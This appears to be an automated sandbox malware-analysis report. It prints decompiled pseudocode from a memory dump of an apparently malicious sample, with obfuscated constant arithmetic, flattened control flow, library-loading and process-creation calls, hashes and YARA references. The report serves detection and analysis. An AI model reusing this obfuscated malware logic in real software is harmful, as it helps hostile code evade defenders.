				_v1092 = 0xdaef;
				_v1092 = _v1092 + 0xffffef8f;
				_v1092 = _v1092 | 0x558b4159;
				_v1092 = _v1092 >> 0xb;
				_v1092 = _v1092 ^ 0x000a96bc;
				_v1084 = 0x9e65;
				_v1084 = _v1084 ^ 0xd37ef8f9;
				_t253 = 0x14;
				_v1084 = _v1084 / _t253;
				_v1084 = _v1084 ^ 0x0a9307fe;
				_v1100 = 0x36e3;
				_v1100 = _v1100 + 0xffff4219;
				_v1100 = _v1100 | 0x679c7357;
				_t254 = 0x3e;
				_v1100 = _v1100 * 0x7e;
				_v1100 = _v1100 ^ 0xffbf63c1;
				_v1108 = 0x25e;
				_v1108 = _v1108 / _t254;
				_v1108 = _v1108 | 0x82073b90;
				_v1108 = _v1108 * 0x30;
				_v1108 = _v1108 ^ 0x615b4461;
				do {
					while(_t216 != 0x295ca1) {
						if(_t216 == 0x1144238d) {
							_t216 = 0x274f9b22;
							continue;
						} else {
							if(_t216 == 0x1718f041) {
								E0024C0C6(_v1092, _v1084,  &_v1040, _v1100, _v1108); // executed
							} else {
								if(_t216 == 0x274f9b22) {
									E00253E3F(_t216,  &_v520, __eflags, _v1088, _v1112);
									_t216 = 0x295ca1;
									continue;
								} else {
									_t264 = _t216 - 0x3691f983;
									if(_t216 != 0x3691f983) {
										goto L10;
									} else {
										_push( &_v1040);
										_push( &_v520);
										E00247B63(_v1104, _v1120, _t264);
										_t248 =  !=  ? 1 : _t248;
										_t216 = 0x1718f041;
										continue;
									}
								}
							}
						}
						L13:
						return _t248;
					}
					_push(_v1068);
					_t204 = E0025889D(0x25c9b0, _v1096, __eflags);
					_pop(_t218);
					_t242 =  *0x25ca2c; // 0x6d8300
					_t176 = _t242 + 0x230; // 0x670056
					E0024C680(_t176, _v1064, _v1080, _t218, _v1072,  *0x25ca2c, _t204,  &_v1040);
					E00252025(_v1060, _t204, _v1116, _v1124);
					_t257 =  &(_t257[9]);
					_t216 = 0x3691f983;
					L10:
					__eflags = _t216 - 0x16e30c37;
				} while (__eflags != 0);
				goto L13;
			}

0x0024ee78
0x0024ee7e
0x0024ee88
0x0024ee90
0x0024ee95
0x0024eea1
0x0024eea3
0x0024eea7
0x0024eeb6
0x0024eeb9
0x0024eec3
0x0024eec4
0x0024eeca
0x0024eed2
0x0024eeda
0x0024eedf
0x0024eee7
0x0024eeef
0x0024eef7
0x0024eeff
0x0024ef07
0x0024ef0f
0x0024ef14
0x0024ef1c
0x0024ef24
0x0024ef33
0x0024ef37
0x0024ef3f
0x0024ef4c
0x0024ef56
0x0024ef57
0x0024ef5d
0x0024ef65
0x0024ef74
0x0024ef78
0x0024ef80
0x0024ef88
0x0024ef8d
0x0024ef95
0x0024ef9d
0x0024efa5
0x0024efaf
0x0024efb3
0x0024efbb
0x0024efc3
0x0024efcb
0x0024efd3
0x0024efdb
0x0024efe3
0x0024efeb
0x0024eff3
0x0024effb
0x0024f003
0x0024f011
0x0024f012
0x0024f016
0x0024f01e
0x0024f028
0x0024f038
0x0024f03e
0x0024f04b
0x0024f055
0x0024f05d
0x0024f065
0x0024f06a
0x0024f072
0x0024f07a
0x0024f082
0x0024f08a
0x0024f092
0x0024f09a
0x0024f09f
0x0024f0a7
0x0024f0af
0x0024f0bb
0x0024f0c0
0x0024f0c6
0x0024f0ce
0x0024f0d6
0x0024f0de
0x0024f0eb
0x0024f0ec
0x0024f0f0
0x0024f0f8
0x0024f106
0x0024f10a
0x0024f117
0x0024f11b
0x0024f123
0x0024f123
0x0024f12d
0x0024f190
0x00000000
0x0024f12f
0x0024f135
0x0024f215
0x0024f13b
0x0024f13d
0x0024f185
0x0024f18c
0x00000000
0x0024f13f
0x0024f13f
0x0024f145
0x00000000
0x0024f14b
0x0024f157
0x0024f15f
0x0024f160
0x0024f16c
0x0024f16f
0x00000000
0x0024f16f
0x0024f145
0x0024f13d
0x0024f135
0x0024f21d
0x0024f229
0x0024f229
0x0024f194
0x0024f1a1
0x0024f1a6
0x0024f1c2
0x0024f1cc
0x0024f1d2
0x0024f1e5
0x0024f1ea
0x0024f1ed
0x0024f1f2
0x0024f1f2
0x0024f1f2
0x00000000

Strings

aD[a, xrefs: 0024F11B
6, xrefs: 0024F0CE
L, xrefs: 0024EFB3
I/5o, xrefs: 0024F072

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: I/5o$aD[a$6$L
API String ID: 0-1330720659
Opcode ID: 64cdcd35b137b005adf91dd992e017ed9687d696902cccaf0d32a6edd37164d1
Instruction ID: 4a89527231b7f1d0ad3a7a27827e3dc941589d4bcf011c1f07380c8e625c823e
Opcode Fuzzy Hash: 64cdcd35b137b005adf91dd992e017ed9687d696902cccaf0d32a6edd37164d1
Instruction Fuzzy Hash: 849141711183419FD358CF25C58941BBBF6BBC4358F10892EF19A9A260D3B9CA19CF87

Uniqueness

Uniqueness Score: -1.00%

Function 00247B63, Relevance: 2.7, Strings: 2, Instructions: 187
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00247B63(void* __ecx, void* __edx, void* __eflags) {
				void* _t227;
				signed int _t253;
				signed int _t257;
				signed int _t258;
				void* _t279;
				void* _t280;

				_t279 = _t280 - 0x70;
				_push( *((intOrPtr*)(_t279 + 0x7c)));
				_push( *((intOrPtr*)(_t279 + 0x78)));
				_push(__edx);
				_push(__ecx);
				E0024602B(_t227);
				 *(_t279 + 0x5c) = 0x4f49;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) + 0xffff573d;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) >> 0xe;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) + 0xffff1f14;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) ^ 0x00031f13;
				 *(_t279 + 0x20) = 0x2d3b;
				 *(_t279 + 0x20) =  *(_t279 + 0x20) << 0xa;
				 *(_t279 + 0x20) =  *(_t279 + 0x20) ^ 0x00b4ea14;
				 *(_t279 + 0x38) = 0xada;
				_t257 = 0x56;
				 *(_t279 + 0x38) =  *(_t279 + 0x38) * 0xd;
				 *(_t279 + 0x38) =  *(_t279 + 0x38) ^ 0x7978ee92;
				 *(_t279 + 0x38) =  *(_t279 + 0x38) ^ 0x79786b80;
				 *(_t279 + 0x44) = 0x9fd0;
				 *(_t279 + 0x44) =  *(_t279 + 0x44) << 0xd;
				 *(_t279 + 0x44) =  *(_t279 + 0x44) + 0xffff90c4;
				 *(_t279 + 0x44) =  *(_t279 + 0x44) ^ 0x13f99f58;
				 *(_t279 + 0x28) = 0xbdd8;
				 *(_t279 + 0x28) =  *(_t279 + 0x28) / _t257;
				 *(_t279 + 0x28) =  *(_t279 + 0x28) ^ 0x65272766;
				 *(_t279 + 0x28) =  *(_t279 + 0x28) ^ 0x65270fe8;
				 *(_t279 + 0x24) = 0xa469;
				 *(_t279 + 0x24) =  *(_t279 + 0x24) * 0x47;
				 *(_t279 + 0x24) =  *(_t279 + 0x24) ^ 0x002db229;
				 *(_t279 + 0x48) = 0xdd17;
				 *(_t279 + 0x48) =  *(_t279 + 0x48) << 4;
				 *(_t279 + 0x48) =  *(_t279 + 0x48) >> 9;
				 *(_t279 + 0x48) =  *(_t279 + 0x48) ^ 0x00005398;
				 *(_t279 + 0x3c) = 0x840;
				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) ^ 0x7135c857;
				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) + 0xffffaa29;
				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) ^ 0x71355336;
				 *(_t279 + 0x34) = 0xe245;
				 *(_t279 + 0x34) =  *(_t279 + 0x34) ^ 0x5c1086b0;
				 *(_t279 + 0x34) =  *(_t279 + 0x34) << 0xc;
				 *(_t279 + 0x34) =  *(_t279 + 0x34) ^ 0x064f42a5;
				 *(_t279 + 0x68) = 0x7c59;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) >> 7;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) + 0xdfb1;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) >> 1;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) ^ 0x00006add;
				 *(_t279 + 0x1c) = 0x17b0;
				 *(_t279 + 0x1c) =  *(_t279 + 0x1c) * 0x33;
				 *(_t279 + 0x1c) =  *(_t279 + 0x1c) ^ 0x0004ea7a;
				 *(_t279 + 0xc) = 0x52de;
				 *(_t279 + 0xc) =  *(_t279 + 0xc) >> 3;
				 *(_t279 + 0xc) =  *(_t279 + 0xc) ^ 0x00000565;
				 *(_t279 + 0x14) = 0xa04a;
				 *(_t279 + 0x14) =  *(_t279 + 0x14) + 0x5b3d;
				 *(_t279 + 0x14) =  *(_t279 + 0x14) ^ 0x0000ad98;
				 *(_t279 + 0x10) = 0x88b9;
				 *(_t279 + 0x10) =  *(_t279 + 0x10) << 0xa;
				 *(_t279 + 0x10) =  *(_t279 + 0x10) ^ 0x0222fd12;
				 *(_t279 + 0x58) = 0x8451;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) << 1;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) + 0xffff44cb;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) + 0xffff231f;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) ^ 0xffff3ae7;
				 *(_t279 + 0x2c) = 0xa221;
				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) << 0xe;
				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) ^ 0x37ec24ae;
				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) ^ 0x1f641a26;
				 *(_t279 + 0x6c) = 0xb834;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) * 5;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) + 0xff22;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) + 0xffff2c65;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) ^ 0x00038cf7;
				 *(_t279 + 0x60) = 0x6d71;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) + 0xffff2e20;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) << 0xa;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) >> 7;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) ^ 0x01fcf6fe;
				 *(_t279 + 0x40) = 0xcc9d;
				 *(_t279 + 0x40) =  *(_t279 + 0x40) << 1;
				 *(_t279 + 0x40) =  *(_t279 + 0x40) | 0xa720d145;
				 *(_t279 + 0x40) =  *(_t279 + 0x40) ^ 0xa721d74b;
				 *(_t279 + 0x50) = 0xea3;
				 *(_t279 + 0x50) =  *(_t279 + 0x50) + 0x27fa;
				 *(_t279 + 0x50) =  *(_t279 + 0x50) >> 7;
				 *(_t279 + 0x50) =  *(_t279 + 0x50) ^ 0x00000071;
				 *(_t279 + 0x64) = 0xe156;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) + 0x8b10;
				_t258 = 0x77;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) / _t258;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) << 7;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) ^ 0x0001fc91;
				 *(_t279 + 0x54) = 0xb949;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) ^ 0xe8c9a038;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) * 0x53;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) * 0x46;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) ^ 0x24032f8e;
				 *(_t279 + 0x4c) = 0x8c7e;
				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) * 0x17;
				_t171 = _t279 - 0x14; // 0x68cf93e9
				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) << 5;
				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) ^ 0x0193ba3f;
				 *(_t279 + 0x30) = 0x8a4e;
				 *(_t279 + 0x30) =  *(_t279 + 0x30) << 0xc;
				 *(_t279 + 0x30) =  *(_t279 + 0x30) | 0xb22e72a5;
				 *(_t279 + 0x30) =  *(_t279 + 0x30) ^ 0xbaaee90f;
				 *(_t279 + 0x18) = 0x537b;
				 *(_t279 + 0x18) =  *(_t279 + 0x18) >> 0x10;
				 *(_t279 + 0x18) =  *(_t279 + 0x18) ^ 0x00002127;
				E002593A8( *(_t279 + 0x44),  *(_t279 + 0x28),  *(_t279 + 0x24), _t171, 0x1e,  *(_t279 + 0x48));
				_t193 = _t279 - 0x21c; // 0x68cf91e1
				E002593A8( *(_t279 + 0x3c),  *(_t279 + 0x34),  *(_t279 + 0x68), _t193, 0x208,  *(_t279 + 0x1c));
				_t198 = _t279 - 0x424; // 0x68cf8fd9
				E002593A8( *(_t279 + 0xc),  *(_t279 + 0x14),  *(_t279 + 0x10), _t198, 0x208,  *(_t279 + 0x58));
				_t202 = _t279 - 0x21c; // 0x68cf91e1
				E00246636(_t202,  *(_t279 + 0x2c),  *(_t279 + 0x6c),  *(_t279 + 0x60),  *((intOrPtr*)(_t279 + 0x78)));
				_t208 = _t279 - 0x424; // 0x68cf8fd9
				E00246636(_t208,  *(_t279 + 0x40),  *(_t279 + 0x50),  *(_t279 + 0x64),  *((intOrPtr*)(_t279 + 0x7c)));
				 *(_t279 - 0x10) =  *(_t279 + 0x5c);
				_t214 = _t279 - 0x14; // 0x68cf93e9
				_t215 = _t279 - 0x21c; // 0x68cf91e1
				 *((intOrPtr*)(_t279 - 0xc)) = _t215;
				_t217 = _t279 - 0x424; // 0x68cf8fd9
				 *((intOrPtr*)(_t279 - 8)) = _t217;
				 *((short*)(_t279 - 4)) =  *(_t279 + 0x38) |  *(_t279 + 0x20);
				_t253 = E00257BF4(_t214,  *(_t279 + 0x54),  *(_t279 + 0x4c),  *(_t279 + 0x30),  *(_t279 + 0x18)); // executed
				asm("sbb eax, eax");
				return  ~_t253 + 1;
			}

0x00247b64
0x00247b6f
0x00247b72
0x00247b75
0x00247b76
0x00247b77
0x00247b7c
0x00247b85
0x00247b8c
0x00247b90
0x00247b97
0x00247b9e
0x00247ba5
0x00247ba9
0x00247bb0
0x00247bbd
0x00247bbe
0x00247bc1
0x00247bc8
0x00247bcf
0x00247bd6
0x00247bda
0x00247be1
0x00247be8
0x00247bf4
0x00247bf7
0x00247bfe
0x00247c05
0x00247c10
0x00247c13
0x00247c1a
0x00247c21
0x00247c25
0x00247c29
0x00247c30
0x00247c37
0x00247c3e
0x00247c45
0x00247c4c
0x00247c53
0x00247c5a
0x00247c5e
0x00247c65
0x00247c6c
0x00247c70
0x00247c77
0x00247c7a
0x00247c81
0x00247c8c
0x00247c8f
0x00247c96
0x00247c9d
0x00247ca1
0x00247ca8
0x00247caf
0x00247cb6
0x00247cbd
0x00247cc4
0x00247cc8
0x00247ccf
0x00247cd6
0x00247cd9
0x00247ce0
0x00247ce7
0x00247cee
0x00247cf5
0x00247cf9
0x00247d00
0x00247d07
0x00247d12
0x00247d15
0x00247d1c
0x00247d23
0x00247d2a
0x00247d33
0x00247d3a
0x00247d3e
0x00247d42
0x00247d49
0x00247d50
0x00247d53
0x00247d5a
0x00247d61
0x00247d68
0x00247d6f
0x00247d73
0x00247d77
0x00247d7e
0x00247d8a
0x00247d8d
0x00247d90
0x00247d94
0x00247d9b
0x00247da2
0x00247dad
0x00247db4
0x00247db7
0x00247dbe
0x00247dc9
0x00247dcc
0x00247dcf
0x00247dd3
0x00247dda
0x00247de1
0x00247de5
0x00247dec
0x00247df3
0x00247dfa
0x00247dfe
0x00247e14
0x00247e21
0x00247e32
0x00247e3a
0x00247e4b
0x00247e53
0x00247e65
0x00247e6d
0x00247e7c
0x00247e84
0x00247e87
0x00247e8a
0x00247e90
0x00247e93
0x00247e99
0x00247ea5
0x00247eb2
0x00247ebc
0x00247ec4

Strings

6S5q, xrefs: 00247C45
f''e, xrefs: 00247BF7

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileOperation
String ID: 6S5q$f''e
API String ID: 3080627654-2864536462
Opcode ID: 36b9ea7229c61bbd42b1c058f75f695ac5583f6220406a17043b82f58b666b25
Instruction ID: 571c8e0eb50c53c2bd8589448332022bb0f3dcdbab6b042a49c7bb96d5940e44
Opcode Fuzzy Hash: 36b9ea7229c61bbd42b1c058f75f695ac5583f6220406a17043b82f58b666b25
Instruction Fuzzy Hash: 8DA1CEB140138D9BEF59CF61C9898CE3BB1BF04358F508119FD2A962A0D3BAD959CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0024B41F, Relevance: 2.6, Strings: 2, Instructions: 76
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E0024B41F(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _t91;
				signed int* _t93;
				intOrPtr _t95;
				signed int _t103;
				signed int _t104;

				_v44 = _v44 & 0x00000000;
				_v48 = 0x783c80;
				_v8 = 0x978d;
				_v8 = _v8 >> 8;
				_v8 = _v8 >> 5;
				_v8 = _v8 | 0x918d7e28;
				_v8 = _v8 ^ 0x918d7bef;
				_v28 = 0x8ae6;
				_v28 = _v28 + 0xffff2048;
				_v28 = _v28 ^ 0xfffff0f4;
				_v40 = 0x90b0;
				_v40 = _v40 + 0x186c;
				_v40 = _v40 ^ 0x0000e60c;
				_v12 = 0x4bc7;
				_t103 = __edx;
				_v12 = _v12 * 0x77;
				_v12 = _v12 >> 8;
				_v12 = _v12 << 3;
				_v12 = _v12 ^ 0x000165a0;
				_v36 = 0x87ea;
				_v36 = _v36 | 0x75974cd4;
				_v36 = _v36 ^ 0x75979443;
				_v32 = 0x7f4c;
				_v32 = _v32 ^ 0x8971dc13;
				_v32 = _v32 ^ 0x89718547;
				_v24 = 0xd36b;
				_t104 = 0x3c;
				_v24 = _v24 * 9;
				_v24 = _v24 << 1;
				_v24 = _v24 >> 5;
				_v24 = _v24 ^ 0x000045e9;
				_v20 = 0xf34d;
				_v20 = _v20 + 0x5309;
				_v20 = _v20 << 0xa;
				_v20 = _v20 | 0x23e3e3ea;
				_v20 = _v20 ^ 0x27fbee67;
				_v16 = 0xef72;
				_v16 = _v16 * 0x55;
				_v16 = _v16 << 0x10;
				_v16 = _v16 / _t104;
				_v16 = _v16 ^ 0x0225d37d;
				_push(_v28);
				_t91 = E00241000(_v40, _v12, _v36, _v32, E0025889D(_t93, _v8, _v16));
				_t95 =  *0x25ca28; // 0x6c3138
				 *((intOrPtr*)(_t95 + 0x1c + _t103 * 4)) = _t91;
				return E00252025(_v24, _t90, _v20, _v16);
			}

0x0024b425
0x0024b429
0x0024b430
0x0024b437
0x0024b43b
0x0024b43f
0x0024b446
0x0024b44d
0x0024b454
0x0024b45b
0x0024b462
0x0024b469
0x0024b470
0x0024b477
0x0024b484
0x0024b48a
0x0024b48d
0x0024b491
0x0024b495
0x0024b49c
0x0024b4a3
0x0024b4aa
0x0024b4b1
0x0024b4b8
0x0024b4bf
0x0024b4c6
0x0024b4d1
0x0024b4d2
0x0024b4d5
0x0024b4d8
0x0024b4dc
0x0024b4e3
0x0024b4ea
0x0024b4f1
0x0024b4f5
0x0024b4fc
0x0024b503
0x0024b50e
0x0024b511
0x0024b51a
0x0024b51d
0x0024b524
0x0024b53e
0x0024b543
0x0024b551
0x0024b565

Strings

#, xrefs: 0024B4F5
81l, xrefs: 0024B543

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad
String ID: 81l$#
API String ID: 1029625771-3509625546
Opcode ID: 27f31e60ba08bd43658c3cf475f9688deb41ec468e88d111212cbed426014f6b
Instruction ID: 932c50aebbb2b3dd25cafbdaec5db1dd313ceae6027c888d54d20d813ccf3926
Opcode Fuzzy Hash: 27f31e60ba08bd43658c3cf475f9688deb41ec468e88d111212cbed426014f6b
Instruction Fuzzy Hash: F541ED72C0131AEBDB08CFA5C94A4EEBBB1FB54318F208599C411B62A4D7B90B58CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0024568E, Relevance: 1.4, Strings: 1, Instructions: 184
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E0024568E(void* __ecx, void* __edx) {
				void* _t188;
				void* _t209;
				void* _t210;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				signed int _t219;
				intOrPtr _t242;
				void* _t245;
				void* _t248;
				void* _t249;

				_t248 = _t249 - 0x5c;
				_t242 =  *((intOrPtr*)(_t248 + 0x6c));
				_t245 = __edx;
				_push(0);
				_push( *((intOrPtr*)(_t248 + 0x78)));
				_push( *((intOrPtr*)(_t248 + 0x74)));
				_push( *((intOrPtr*)(_t248 + 0x70)));
				_push(_t242);
				_push( *((intOrPtr*)(_t248 + 0x68)));
				_push( *((intOrPtr*)(_t248 + 0x64)));
				_push(__edx);
				_push(__ecx);
				E0024602B(_t188);
				 *(_t248 + 0x38) = 0xda0c;
				 *(_t248 + 0x38) =  *(_t248 + 0x38) << 7;
				_t215 = 0x75;
				 *(_t248 + 0x38) =  *(_t248 + 0x38) * 0x59;
				 *(_t248 + 0x38) =  *(_t248 + 0x38) ^ 0x25e734ff;
				 *(_t248 + 0x54) = 0xb39d;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) << 6;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) | 0xca3cae0f;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) * 0xe;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) ^ 0x0f551016;
				 *(_t248 + 0x1c) = 0x5da7;
				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) ^ 0x52b401ed;
				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) / _t215;
				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) ^ 0x00b496a1;
				 *(_t248 + 0x30) = 0xba31;
				_t216 = 0x2c;
				 *(_t248 + 0x30) =  *(_t248 + 0x30) / _t216;
				 *(_t248 + 0x30) =  *(_t248 + 0x30) | 0x346b3718;
				 *(_t248 + 0x30) =  *(_t248 + 0x30) ^ 0x346b13e9;
				 *(_t248 + 0x2c) = 0x6402;
				_t217 = 0x3f;
				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) * 0x14;
				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) >> 2;
				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) ^ 0x0001cbcb;
				 *(_t248 + 0x34) = 0x3e45;
				 *(_t248 + 0x34) =  *(_t248 + 0x34) << 0xb;
				 *(_t248 + 0x34) =  *(_t248 + 0x34) >> 2;
				 *(_t248 + 0x34) =  *(_t248 + 0x34) ^ 0x007ce60c;
				 *(_t248 + 0x3c) = 0xfd38;
				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) + 0xffffe888;
				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) * 0x69;
				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) ^ 0x005e4f03;
				 *(_t248 + 0x40) = 0xcc4c;
				 *(_t248 + 0x40) =  *(_t248 + 0x40) ^ 0x07f5c2dc;
				 *(_t248 + 0x40) =  *(_t248 + 0x40) / _t217;
				 *(_t248 + 0x40) =  *(_t248 + 0x40) ^ 0x00207040;
				 *(_t248 + 0x28) = 0x6724;
				 *(_t248 + 0x28) =  *(_t248 + 0x28) + 0xffffafc3;
				 *(_t248 + 0x28) =  *(_t248 + 0x28) << 1;
				 *(_t248 + 0x28) =  *(_t248 + 0x28) ^ 0x000008e0;
				 *(_t248 + 0x24) = 0x9d87;
				 *(_t248 + 0x24) =  *(_t248 + 0x24) >> 6;
				 *(_t248 + 0x24) =  *(_t248 + 0x24) * 0x24;
				 *(_t248 + 0x24) =  *(_t248 + 0x24) ^ 0x00004341;
				 *(_t248 + 0x58) = 0xb89d;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) >> 0xb;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) + 0x8f1;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) << 8;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) ^ 0x00091f00;
				 *(_t248 + 0x44) = 0x534f;
				 *(_t248 + 0x44) =  *(_t248 + 0x44) + 0x522f;
				 *(_t248 + 0x44) =  *(_t248 + 0x44) ^ 0x4c12b7e9;
				 *(_t248 + 0x44) =  *(_t248 + 0x44) ^ 0x4c125009;
				 *(_t248 + 0x20) = 0x7c36;
				 *(_t248 + 0x20) =  *(_t248 + 0x20) ^ 0x32feb437;
				_t218 = 0x73;
				 *(_t248 + 0x20) =  *(_t248 + 0x20) / _t218;
				 *(_t248 + 0x20) =  *(_t248 + 0x20) ^ 0x0071b2de;
				 *(_t248 + 0x4c) = 0x6d80;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) + 0xd21e;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) + 0xffff4640;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) ^ 0x36936ae7;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) ^ 0x3693cc91;
				 *(_t248 + 0x50) = 0x11c0;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) | 0x65d8412a;
				_t219 = 0x49;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) / _t219;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) | 0x06211354;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) ^ 0x076544c6;
				 *(_t248 + 0x18) = 0x8ddc;
				 *(_t248 + 0x18) =  *(_t248 + 0x18) | 0x3e354716;
				 *(_t248 + 0x18) =  *(_t248 + 0x18) ^ 0x3e35d915;
				 *(_t248 + 0x14) = 0xfbdb;
				 *(_t248 + 0x14) =  *(_t248 + 0x14) * 0x44;
				 *(_t248 + 0x14) =  *(_t248 + 0x14) ^ 0x0042d7a4;
				 *(_t248 + 0x48) = 0xd404;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) >> 1;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) + 0x728c;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) + 0xfe7d;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) ^ 0x0001b0de;
				_t220 =  *(_t248 + 0x38);
				E002593A8( *(_t248 + 0x38),  *(_t248 + 0x54),  *(_t248 + 0x1c), _t248 - 0x40, 0x44,  *(_t248 + 0x30));
				 *((intOrPtr*)(_t248 - 0x40)) = 0x44;
				_t209 = E0025976F( *(_t248 + 0x2c), _t248 + 4,  *(_t248 + 0x34),  *(_t248 + 0x3c),  *(_t248 + 0x40),  *(_t248 + 0x28), _t248 - 0x40, _t245,  *(_t248 + 0x24),  *(_t248 + 0x38), _t220,  *(_t248 + 0x58),  *(_t248 + 0x44), _t220,  *(_t248 + 0x20),  *(_t248 + 0x4c),  *((intOrPtr*)(_t248 + 0x64)), _t220,  *((intOrPtr*)(_t248 + 0x74))); // executed
				if(_t209 == 0) {
					_t210 = 0;
				} else {
					if(_t242 == 0) {
						E00254F7D( *(_t248 + 0x50),  *(_t248 + 0x18),  *((intOrPtr*)(_t248 + 4)));
						E00254F7D( *(_t248 + 0x14),  *(_t248 + 0x48),  *((intOrPtr*)(_t248 + 8)));
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t210 = 1;
				}
				return _t210;
			}

0x0024568f
0x0024569b
0x0024569e
0x002456a0
0x002456a2
0x002456a5
0x002456a8
0x002456ab
0x002456ac
0x002456af
0x002456b2
0x002456b3
0x002456b4
0x002456b9
0x002456c2
0x002456cc
0x002456cf
0x002456d2
0x002456d9
0x002456e0
0x002456e4
0x002456ef
0x002456f2
0x002456f9
0x00245700
0x0024570e
0x00245711
0x00245718
0x00245722
0x00245727
0x0024572c
0x00245733
0x0024573a
0x00245745
0x00245746
0x00245749
0x0024574d
0x00245754
0x0024575b
0x0024575f
0x00245763
0x0024576a
0x00245771
0x0024577c
0x0024577f
0x00245786
0x0024578d
0x00245799
0x0024579c
0x002457a3
0x002457aa
0x002457b1
0x002457b4
0x002457bb
0x002457c2
0x002457ca
0x002457cd
0x002457d4
0x002457db
0x002457df
0x002457e6
0x002457ea
0x002457f1
0x002457f8
0x00245801
0x00245808
0x0024580f
0x00245816
0x00245822
0x00245827
0x0024582c
0x00245833
0x0024583a
0x00245841
0x00245848
0x0024584f
0x00245856
0x0024585d
0x00245867
0x0024586a
0x0024586d
0x00245874
0x0024587b
0x00245882
0x00245889
0x00245890
0x0024589b
0x002458a1
0x002458a8
0x002458af
0x002458b2
0x002458b9
0x002458c0
0x002458d3
0x002458d6
0x002458de
0x00245915
0x0024591f
0x00245951
0x00245921
0x00245923
0x0024593a
0x00245948
0x00245925
0x00245928
0x00245929
0x0024592a
0x0024592b
0x0024592b
0x0024592e
0x0024592e
0x00245959

Strings

@p , xrefs: 0024579C

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

